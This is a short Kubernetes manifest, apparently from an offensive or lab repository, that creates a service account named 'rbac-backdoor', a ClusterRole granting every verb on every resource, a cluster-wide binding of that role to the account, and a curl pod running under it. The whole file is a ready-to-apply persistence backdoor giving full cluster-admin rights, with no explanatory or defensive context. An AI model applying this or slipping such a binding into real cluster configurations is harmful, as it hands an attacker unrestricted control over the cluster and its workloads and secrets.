apiVersion: v1
kind: ServiceAccount
metadata:
  name: rbac-backdoor
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: rbac-pwn-role
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: rbac-pwn-binding
subjects:
- kind: ServiceAccount
  name: rbac-backdoor
  namespace: default
roleRef:
  kind: ClusterRole
  name: rbac-pwn-role
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Pod
metadata:
  name: rbac-pwn-pod
  namespace: default
spec:
  serviceAccountName: rbac-backdoor
  containers:
  - name: curl-container
    image: curlimages/curl:latest
    command: ["sleep", "3600"]
